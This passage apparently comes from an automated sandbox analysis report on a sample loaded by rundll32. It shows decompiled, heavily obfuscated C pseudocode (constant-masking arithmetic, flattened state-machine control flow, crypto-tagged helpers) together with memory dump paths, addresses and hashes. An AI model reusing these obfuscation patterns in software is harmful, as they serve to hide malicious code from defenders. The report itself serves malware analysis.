				_v544 = _v544 ^ 0xe6b61282;
				_v544 = _v544 ^ 0xeb41e563;
				_v552 = 0x262f60;
				_v552 = _v552 ^ 0x76c91adc;
				_v552 = _v552 + 0xd1c5;
				_v552 = _v552 ^ 0x76fc323e;
				_v524 = 0xf427e0;
				_v524 = _v524 + 0xffff22a3;
				_v524 = _v524 ^ 0x00f85f52;
				_v548 = 0xdbc1a5;
				_v548 = _v548 >> 0xb;
				_v548 = _v548 + 0xf615;
				_v548 = _v548 ^ 0x0006ff3e;
				_v556 = 0xd2f840;
				_v556 = _v556 * 0x5f;
				_t134 = 0;
				_v556 = _v556 ^ 0x4e4cccaa;
				_v568 = 0x74ecfa;
				_t132 = 0x53;
				_t133 = _v556;
				_v568 = _v568 / _t132;
				_v568 = _v568 ^ 0xc72664ff;
				_v568 = _v568 << 0xf;
				_v568 = _v568 ^ 0x862d9f40;
				_v536 = 0xc0d44a;
				_v536 = _v536 + 0x396d;
				_t135 = _v556;
				_t117 = _v556;
				_v536 = _v536 * 0x46;
				_v536 = _v536 ^ 0x34c6c601;
				_v532 = 0xf37e83;
				_v532 = _v532 << 8;
				_v532 = _v532 | 0x760e0a19;
				_v532 = _v532 ^ 0xf77c332a;
				_v528 = 0x91f8e3;
				_v528 = _v528 ^ 0xc904aca2;
				_v528 = _v528 ^ 0xc9900919;
				do {
					while(_t118 != 0x27fe330) {
						if(_t118 == 0x4ead2fe) {
							_t118 = 0x96d401d;
							continue;
						} else {
							if(_t118 == 0x7ac597b) {
								_t117 = E0068B6CF( &_v520, _v548, _v556, _v568);
								_t118 = 0xa7595e6;
								continue;
							} else {
								if(_t118 == 0x80b0e4e) {
									_t90 =  &_v552; // 0xeb41e563
									_t111 = E00689B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
									_t136 =  &(_t136[4]);
									__eflags = _t111;
									if(__eflags != 0) {
										_t118 = 0x7ac597b;
										continue;
									}
								} else {
									if(_t118 == 0x96d401d) {
										_t115 = E006852C2();
										_t133 = _t115;
										__eflags = _t115;
										if(__eflags != 0) {
											_t118 = 0x80b0e4e;
											continue;
										}
									} else {
										if(_t118 != 0xa7595e6) {
											goto L15;
										} else {
											_t135 = E00682051(_v532, _t117, _v528);
											_t118 = 0x27fe330;
											continue;
										}
									}
								}
							}
						}
						goto L16;
					}
					_v564 = 0x69bdc3;
					_v564 = _v564 | 0xfd1bce6c;
					_v564 = _v564 ^ 0xf153ffb6;
					_v564 = _v564 ^ 0x260f00bb;
					__eflags = _t135 - _v564;
					_t134 =  ==  ? 1 : _t134;
					_t118 = 0x8b668cc;
					L15:
					__eflags = _t118 - 0x8b668cc;
				} while (__eflags != 0);
				L16:
				return _t134;
			}
























                                                                                                                      0x00699bcf
                                                                                                                      0x00699bd9
                                                                                                                      0x00699be3
                                                                                                                      0x00699be8
                                                                                                                      0x00699bed
                                                                                                                      0x00699bf5
                                                                                                                      0x00699bfd
                                                                                                                      0x00699c05
                                                                                                                      0x00699c0d
                                                                                                                      0x00699c12
                                                                                                                      0x00699c17
                                                                                                                      0x00699c1f
                                                                                                                      0x00699c27
                                                                                                                      0x00699c2f
                                                                                                                      0x00699c37
                                                                                                                      0x00699c3f
                                                                                                                      0x00699c47
                                                                                                                      0x00699c4f
                                                                                                                      0x00699c57
                                                                                                                      0x00699c5f
                                                                                                                      0x00699c67
                                                                                                                      0x00699c6f
                                                                                                                      0x00699c77
                                                                                                                      0x00699c7f
                                                                                                                      0x00699c84
                                                                                                                      0x00699c8c
                                                                                                                      0x00699c94
                                                                                                                      0x00699ca1
                                                                                                                      0x00699ca5
                                                                                                                      0x00699ca7
                                                                                                                      0x00699caf
                                                                                                                      0x00699cbd
                                                                                                                      0x00699cc0
                                                                                                                      0x00699cc4
                                                                                                                      0x00699cc8
                                                                                                                      0x00699cd0
                                                                                                                      0x00699cd5
                                                                                                                      0x00699cdd
                                                                                                                      0x00699ce5
                                                                                                                      0x00699cf2
                                                                                                                      0x00699cf6
                                                                                                                      0x00699cfa
                                                                                                                      0x00699cfe
                                                                                                                      0x00699d06
                                                                                                                      0x00699d0e
                                                                                                                      0x00699d13
                                                                                                                      0x00699d1b
                                                                                                                      0x00699d23
                                                                                                                      0x00699d2b
                                                                                                                      0x00699d33
                                                                                                                      0x00699d3b
                                                                                                                      0x00699d3b
                                                                                                                      0x00699d4d
                                                                                                                      0x00699e02
                                                                                                                      0x00000000
                                                                                                                      0x00699d53
                                                                                                                      0x00699d59
                                                                                                                      0x00699df6
                                                                                                                      0x00699df8
                                                                                                                      0x00000000
                                                                                                                      0x00699d5f
                                                                                                                      0x00699d65
                                                                                                                      0x00699dc1
                                                                                                                      0x00699dc9
                                                                                                                      0x00699dce
                                                                                                                      0x00699dd1
                                                                                                                      0x00699dd3
                                                                                                                      0x00699dd5
                                                                                                                      0x00000000
                                                                                                                      0x00699dd5
                                                                                                                      0x00699d67
                                                                                                                      0x00699d6d
                                                                                                                      0x00699da0
                                                                                                                      0x00699da5
                                                                                                                      0x00699da7
                                                                                                                      0x00699da9
                                                                                                                      0x00699daf
                                                                                                                      0x00000000
                                                                                                                      0x00699daf
                                                                                                                      0x00699d6f
                                                                                                                      0x00699d75
                                                                                                                      0x00000000
                                                                                                                      0x00699d7b
                                                                                                                      0x00699d8f
                                                                                                                      0x00699d91
                                                                                                                      0x00000000
                                                                                                                      0x00699d91
                                                                                                                      0x00699d75
                                                                                                                      0x00699d6d
                                                                                                                      0x00699d65
                                                                                                                      0x00699d59
                                                                                                                      0x00000000
                                                                                                                      0x00699d4d
                                                                                                                      0x00699e0c
                                                                                                                      0x00699e16
                                                                                                                      0x00699e1f
                                                                                                                      0x00699e27
                                                                                                                      0x00699e33
                                                                                                                      0x00699e35
                                                                                                                      0x00699e38
                                                                                                                      0x00699e3d
                                                                                                                      0x00699e3d
                                                                                                                      0x00699e3d
                                                                                                                      0x00699e4a
                                                                                                                      0x00699e55

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <~)$`/&$cA$m9
                                                                                                                      • API String ID: 0-2671356241
                                                                                                                      • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                      • Instruction ID: 8b7fab387357c2f20dac821a7ff439ed79f79cc0f6a0a3ef175d01a7daee2e89
                                                                                                                      • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                      • Instruction Fuzzy Hash: 4651757100C3019FC788CE25D09642BBBE2FFD8758F501E1EF5A692660C774CA0A8FA2
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00689B83 Relevance: 5.1, Strings: 4, Instructions: 109COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E00689B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _v64;
				intOrPtr _v68;
				void* _t115;
				signed int _t130;
				signed int _t131;
				void* _t133;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(0x104);
				_push(__ecx);
				E006920B9(0x104);
				_v68 = 0x342964;
				asm("stosd");
				_t133 = 0;
				asm("stosd");
				asm("stosd");
				_v40 = 0xa3a3c;
				_v40 = _v40 + 0x2c25;
				_v40 = _v40 ^ 0x000a7661;
				_v16 = 0x75ee44;
				_t130 = 0x7a;
				_v16 = _v16 / _t130;
				_v16 = _v16 ^ 0xc9e42672;
				_v16 = _v16 ^ 0xc9e58a7e;
				_v8 = 0x386b92;
				_v8 = _v8 << 4;
				_v8 = _v8 | 0x0ec9a536;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x000b4478;
				_v44 = 0xd66787;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x001d593f;
				_v24 = 0x7c5a73;
				_v24 = _v24 | 0xae316990;
				_t131 = 0x19;
				_v24 = _v24 / _t131;
				_v24 = _v24 ^ 0x06f0967a;
				_v20 = 0x3dfd52;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x24;
				_v20 = _v20 ^ 0x0009affd;
				_v12 = 0xf0c6a5;
				_v12 = _v12 + 0xffff2be4;
				_v12 = _v12 + 0x1686;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x03c3840c;
				_v48 = 0x30c967;
				_v48 = _v48 | 0xcae095b2;
				_v48 = _v48 ^ 0xcaf7f966;
				_v36 = 0xabcbdc;
				_v36 = _v36 + 0xfffff856;
				_v36 = _v36 | 0xb2b71321;
				_v36 = _v36 ^ 0xb2b3c312;
				_v32 = 0xda8dbe;
				_v32 = _v32 + 0xffff364b;
				_v32 = _v32 | 0x02598b37;
				_v32 = _v32 ^ 0x02d31c0a;
				_v28 = 0x528ee8;
				_v28 = _v28 * 0x12;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x17383776;
				_t115 = E006891DD(__ecx, _v40, __ecx);
				_t132 = _t115;
				if(_t115 != 0) {
					_t133 = E006876AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
					E00691E67(_v48, _v36, _v32, _v28, _t132);
				}
				return _t133;
			}





















                                                                                                                      0x00689b8b
                                                                                                                      0x00689b93
                                                                                                                      0x00689b96
                                                                                                                      0x00689b99
                                                                                                                      0x00689b9c
                                                                                                                      0x00689b9f
                                                                                                                      0x00689ba0
                                                                                                                      0x00689ba1
                                                                                                                      0x00689ba6
                                                                                                                      0x00689bb4
                                                                                                                      0x00689bb5
                                                                                                                      0x00689bb9
                                                                                                                      0x00689bba
                                                                                                                      0x00689bbb
                                                                                                                      0x00689bc2
                                                                                                                      0x00689bc9
                                                                                                                      0x00689bd0
                                                                                                                      0x00689bda
                                                                                                                      0x00689bdf
                                                                                                                      0x00689be4
                                                                                                                      0x00689beb
                                                                                                                      0x00689bf2
                                                                                                                      0x00689bf9
                                                                                                                      0x00689bfd
                                                                                                                      0x00689c04
                                                                                                                      0x00689c08
                                                                                                                      0x00689c0f
                                                                                                                      0x00689c16
                                                                                                                      0x00689c1a
                                                                                                                      0x00689c21
                                                                                                                      0x00689c28
                                                                                                                      0x00689c32
                                                                                                                      0x00689c38
                                                                                                                      0x00689c3b
                                                                                                                      0x00689c42
                                                                                                                      0x00689c49
                                                                                                                      0x00689c52
                                                                                                                      0x00689c55
                                                                                                                      0x00689c5c
                                                                                                                      0x00689c63
                                                                                                                      0x00689c6a
                                                                                                                      0x00689c71
                                                                                                                      0x00689c75
                                                                                                                      0x00689c7c
                                                                                                                      0x00689c83
                                                                                                                      0x00689c8a
                                                                                                                      0x00689c91
                                                                                                                      0x00689c98
                                                                                                                      0x00689c9f
                                                                                                                      0x00689ca6
                                                                                                                      0x00689cad
                                                                                                                      0x00689cb4
                                                                                                                      0x00689cbb
                                                                                                                      0x00689cc2
                                                                                                                      0x00689cc9
                                                                                                                      0x00689cd4
                                                                                                                      0x00689cd7
                                                                                                                      0x00689cdb
                                                                                                                      0x00689ceb
                                                                                                                      0x00689cf3
                                                                                                                      0x00689cf7
                                                                                                                      0x00689d16
                                                                                                                      0x00689d21
                                                                                                                      0x00689d26
                                                                                                                      0x00689d30

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Du$av$d)4$sZ|
                                                                                                                      • API String ID: 0-269012183
                                                                                                                      • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                      • Instruction ID: 4b99a67766652a644953cdf12cd172b258ef2a8357da38dc02326de1140532b9
                                                                                                                      • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                      • Instruction Fuzzy Hash: 1E5112B1D00209EBDF09DFE5C94A8EEFBB1FB48318F108158E412B6260D3755A58DFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                      • GetACP.KERNEL32 ref: 1004377E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4232894706-0
                                                                                                                      • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                      • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                      • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                      • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                      • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00690E53 Relevance: 4.1, Strings: 3, Instructions: 343COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E00690E53(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t406;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t435;
				void* _t467;
				void* _t468;
				signed int* _t472;

				_t472 =  &_v2772;
				_v2700 = 0xd36ba7;
				_v2700 = _v2700 << 7;
				_v2700 = _v2700 ^ 0xaed70c65;
				_v2700 = _v2700 ^ 0xc762dfcc;
				_v2652 = 0x6f4609;
				_t9 =  &_v2652; // 0x6f4609
				_v2652 =  *_t9 * 0x1c;
				_t467 = __ecx;
				_v2652 = _v2652 ^ 0x0c23569d;
				_t468 = 0xea1969c;
				_v2608 = 0xb8394b;
				_v2608 = _v2608 + 0xaeb5;
				_v2608 = _v2608 ^ 0x00b390c3;
				_v2736 = 0x3d33f1;
				_v2736 = _v2736 + 0xffffd537;
				_v2736 = _v2736 + 0xffffb6ee;
				_v2736 = _v2736 + 0xbad8;
				_v2736 = _v2736 ^ 0x003e0409;
				_v2768 = 0xd1d4ce;
				_v2768 = _v2768 >> 0xc;
				_v2768 = _v2768 ^ 0xb5c37fe4;
				_v2768 = _v2768 + 0x4eb3;
				_v2768 = _v2768 ^ 0xb5c2c9c4;
				_v2760 = 0x157bbd;
				_v2760 = _v2760 ^ 0x6d7617e7;
				_v2760 = _v2760 ^ 0x1b56cd2f;
				_v2760 = _v2760 ^ 0xfb63426d;
				_v2760 = _v2760 ^ 0x8d577604;
				_v2604 = 0x1fac8b;
				_v2604 = _v2604 + 0x9962;
				_v2604 = _v2604 ^ 0x0029d956;
				_v2696 = 0x3d46b4;
				_v2696 = _v2696 | 0x3d7fd3ff;
				_v2696 = _v2696 ^ 0x3d7bd02d;
				_v2720 = 0xad1695;
				_t426 = 9;
				_v2720 = _v2720 * 0x4b;
				_v2720 = _v2720 >> 0x10;
				_v2720 = _v2720 << 0xe;
				_v2720 = _v2720 ^ 0x0cab1f79;
				_v2644 = 0xe14118;
				_v2644 = _v2644 ^ 0x82369820;
				_v2644 = _v2644 ^ 0x82de8a4e;
				_v2668 = 0x391c30;
				_v2668 = _v2668 >> 7;
				_v2668 = _v2668 + 0xffff3589;
				_v2668 = _v2668 ^ 0xfff6d862;
				_v2692 = 0x9dbc3;
				_v2692 = _v2692 << 8;
				_v2692 = _v2692 * 0x75;
				_v2692 = _v2692 ^ 0x81749ad9;
				_v2660 = 0x144a46;
				_v2660 = _v2660 >> 0xd;
				_v2660 = _v2660 ^ 0x0008b8c7;
				_v2752 = 0x703c03;
				_v2752 = _v2752 * 0x74;
				_v2752 = _v2752 ^ 0x2e54cb21;
				_v2752 = _v2752 | 0x6f17e683;
				_v2752 = _v2752 ^ 0x7f96e2f0;
				_v2676 = 0xa438e5;
				_v2676 = _v2676 / _t426;
				_v2676 = _v2676 + 0x92ff;
				_v2676 = _v2676 ^ 0x0015b827;
				_v2612 = 0x1c48b9;
				_t427 = 0x1a;
				_v2612 = _v2612 / _t427;
				_v2612 = _v2612 ^ 0x000154fb;
				_v2628 = 0x490198;
				_v2628 = _v2628 | 0x561f6486;
				_v2628 = _v2628 ^ 0x565ec1b9;
				_v2616 = 0xcec4ed;
				_t428 = 0x3d;
				_v2616 = _v2616 * 9;
				_v2616 = _v2616 ^ 0x074f393e;
				_v2636 = 0x4be85b;
				_v2636 = _v2636 >> 1;
				_v2636 = _v2636 ^ 0x002afd34;
				_v2728 = 0xca47ed;
				_v2728 = _v2728 << 1;
				_v2728 = _v2728 / _t428;
				_v2728 = _v2728 >> 3;
				_v2728 = _v2728 ^ 0x00084593;
				_v2620 = 0x793301;
				_v2620 = _v2620 | 0xccc0d5da;
				_v2620 = _v2620 ^ 0xccf56683;
				_v2684 = 0xd6c9e7;
				_v2684 = _v2684 >> 8;
				_v2684 = _v2684 + 0x30fc;
				_v2684 = _v2684 ^ 0x000dbf27;
				_v2656 = 0x6cf887;
				_v2656 = _v2656 | 0x54469415;
				_v2656 = _v2656 ^ 0x5469dd96;
				_v2712 = 0x1ba43e;
				_v2712 = _v2712 + 0xffff54b6;
				_v2712 = _v2712 >> 0x10;
				_v2712 = _v2712 ^ 0x536d0b9d;
				_v2712 = _v2712 ^ 0x5368fd88;
				_v2744 = 0x7fa81e;
				_v2744 = _v2744 + 0x45dd;
				_v2744 = _v2744 | 0xcc5c3b14;
				_t429 = 0x76;
				_v2744 = _v2744 * 0x48;
				_v2744 = _v2744 ^ 0x83f6fb81;
				_v2704 = 0x73cce1;
				_v2704 = _v2704 >> 6;
				_v2704 = _v2704 | 0x0e0742c3;
				_v2704 = _v2704 ^ 0x0e0521c8;
				_v2764 = 0x3737a7;
				_v2764 = _v2764 >> 0xb;
				_v2764 = _v2764 << 3;
				_v2764 = _v2764 + 0x14ac;
				_v2764 = _v2764 ^ 0x0004654a;
				_v2772 = 0xaeb57f;
				_v2772 = _v2772 / _t429;
				_v2772 = _v2772 << 0xf;
				_t430 = 0x37;
				_v2772 = _v2772 / _t430;
				_v2772 = _v2772 ^ 0x037ee988;
				_v2648 = 0x954498;
				_t431 = 0x4b;
				_v2648 = _v2648 / _t431;
				_v2648 = _v2648 ^ 0x00054dec;
				_v2640 = 0x8be41e;
				_v2640 = _v2640 >> 0xd;
				_v2640 = _v2640 ^ 0x00089615;
				_v2748 = 0xfabe1b;
				_v2748 = _v2748 ^ 0xff42a680;
				_v2748 = _v2748 + 0xffff8ee7;
				_v2748 = _v2748 + 0x1c5a;
				_v2748 = _v2748 ^ 0xffbaa703;
				_v2756 = 0x33a01d;
				_v2756 = _v2756 * 0x6f;
				_v2756 = _v2756 << 4;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 ^ 0x066d94da;
				_v2672 = 0x7cb69f;
				_v2672 = _v2672 << 4;
				_v2672 = _v2672 * 0x4a;
				_v2672 = _v2672 ^ 0x40c5c2d0;
				_v2680 = 0xc0e1f8;
				_v2680 = _v2680 << 1;
				_v2680 = _v2680 | 0xa5ca1830;
				_v2680 = _v2680 ^ 0xa5ca6401;
				_v2732 = 0xd52773;
				_v2732 = _v2732 ^ 0x8b84e9f5;
				_v2732 = _v2732 + 0xffffa58a;
				_v2732 = _v2732 >> 1;
				_v2732 = _v2732 ^ 0x45a69f9f;
				_v2740 = 0x525c84;
				_v2740 = _v2740 * 0x45;
				_v2740 = _v2740 << 0xd;
				_v2740 = _v2740 + 0xffffe485;
				_v2740 = _v2740 ^ 0x5df42895;
				_v2688 = 0x8afd1b;
				_v2688 = _v2688 >> 0xa;
				_v2688 = _v2688 * 0x44;
				_v2688 = _v2688 ^ 0x000c822b;
				_v2632 = 0xb6ec99;
				_v2632 = _v2632 + 0xffff2a9a;
				_v2632 = _v2632 ^ 0x00b1db1a;
				_v2664 = 0xfa37e2;
				_v2664 = _v2664 * 0x4c;
				_v2664 = _v2664 + 0x9251;
				_v2664 = _v2664 ^ 0x4a4e0c53;
				_v2708 = 0xf9311d;
				_v2708 = _v2708 >> 2;
				_t406 = _v2708 * 0x30;
				_v2708 = _t406;
				_v2708 = _v2708 + 0xffffde46;
				_v2708 = _v2708 ^ 0x0bad021b;
				_v2624 = 0x51d14;
				_v2624 = _v2624 | 0x271919e8;
				_v2624 = _v2624 ^ 0x2716653c;
				_v2716 = 0x708eea;
				_v2716 = _v2716 + 0xfffff8d8;
				_v2716 = _v2716 | 0x4ca3cf3c;
				_v2716 = _v2716 ^ 0x396f5f4d;
				_v2716 = _v2716 ^ 0x7599e4cd;
				_v2724 = 0x3acc77;
				_v2724 = _v2724 + 0x56d;
				_v2724 = _v2724 + 0xb0bb;
				_v2724 = _v2724 + 0xffffce89;
				_v2724 = _v2724 ^ 0x003c4612;
				while(_t468 != 0x5de06da) {
					if(_t468 == 0xea1969c) {
						_t468 = 0xfa9128f;
						continue;
					} else {
						_t480 = _t468 - 0xfa9128f;
						if(_t468 != 0xfa9128f) {
							L8:
							__eflags = _t468 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0069DA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
							 *((short*)(E0068B6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
							E00688969(_v2720,  &_v1560, _t480, _v2644, _v2668);
							_push(_v2752);
							_push(_v2660);
							E006847CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E0069DCF7(_v2692, 0x681308, _t480),  &_v1560, _v2616, _v2636);
							E0068A8B0(_v2728, _t419, _v2620);
							_t431 = _v2684;
							_t406 = E0068EA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
							_t472 =  &(_t472[0x17]);
							if(_t406 != 0) {
								_t468 = 0x5de06da;
								continue;
							}
						}
					}
					return _t406;
				}
				_push(_v2648);
				_push(_v2700);
				_push(_v2772);
				_push( &_v1040);
				E006946BB(_v2704, _v2764);
				_push(_v2756);
				_push(_v2748);
				E006847CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E0069DCF7(_v2640, 0x6813b8, __eflags),  &_v2080, _v2740, _v2688);
				_t435 = _v2632;
				E0068A8B0(_t435, _t409, _v2664);
				__eflags = 0;
				_push(_v2724);
				_push(0);
				_push(_t435);
				_push(0);
				_push(0);
				_push(_v2716);
				_t431 = _v2708;
				_push( &_v520);
				_t406 = E0068AB87(_v2708, _v2624, 0);
				_t472 = _t472 - 0xc + 0x64;
				_t468 = 0xa8e801c;
				goto L8;
			}





























































                                                                                                                      0x00690e53
                                                                                                                      0x00690e59
                                                                                                                      0x00690e63
                                                                                                                      0x00690e68
                                                                                                                      0x00690e70
                                                                                                                      0x00690e78
                                                                                                                      0x00690e80
                                                                                                                      0x00690e89
                                                                                                                      0x00690e90
                                                                                                                      0x00690e92
                                                                                                                      0x00690e9d
                                                                                                                      0x00690ea2
                                                                                                                      0x00690ead
                                                                                                                      0x00690eb8
                                                                                                                      0x00690ec3
                                                                                                                      0x00690ecb
                                                                                                                      0x00690ed3
                                                                                                                      0x00690edb
                                                                                                                      0x00690ee3
                                                                                                                      0x00690eeb
                                                                                                                      0x00690ef3
                                                                                                                      0x00690ef8
                                                                                                                      0x00690f00
                                                                                                                      0x00690f08
                                                                                                                      0x00690f10
                                                                                                                      0x00690f18
                                                                                                                      0x00690f20
                                                                                                                      0x00690f28
                                                                                                                      0x00690f30
                                                                                                                      0x00690f38
                                                                                                                      0x00690f43
                                                                                                                      0x00690f4e
                                                                                                                      0x00690f59
                                                                                                                      0x00690f61
                                                                                                                      0x00690f69
                                                                                                                      0x00690f71
                                                                                                                      0x00690f80
                                                                                                                      0x00690f83
                                                                                                                      0x00690f87
                                                                                                                      0x00690f8c
                                                                                                                      0x00690f91
                                                                                                                      0x00690f99
                                                                                                                      0x00690fa4
                                                                                                                      0x00690faf
                                                                                                                      0x00690fba
                                                                                                                      0x00690fc2
                                                                                                                      0x00690fc7
                                                                                                                      0x00690fcf
                                                                                                                      0x00690fd7
                                                                                                                      0x00690fdf
                                                                                                                      0x00690fe9
                                                                                                                      0x00690fed
                                                                                                                      0x00690ff5
                                                                                                                      0x00691000
                                                                                                                      0x00691008
                                                                                                                      0x00691013
                                                                                                                      0x00691020
                                                                                                                      0x00691024
                                                                                                                      0x0069102c
                                                                                                                      0x00691034
                                                                                                                      0x0069103c
                                                                                                                      0x0069104c
                                                                                                                      0x00691050
                                                                                                                      0x00691058
                                                                                                                      0x00691060
                                                                                                                      0x00691072
                                                                                                                      0x00691075
                                                                                                                      0x0069107c
                                                                                                                      0x00691089
                                                                                                                      0x00691094
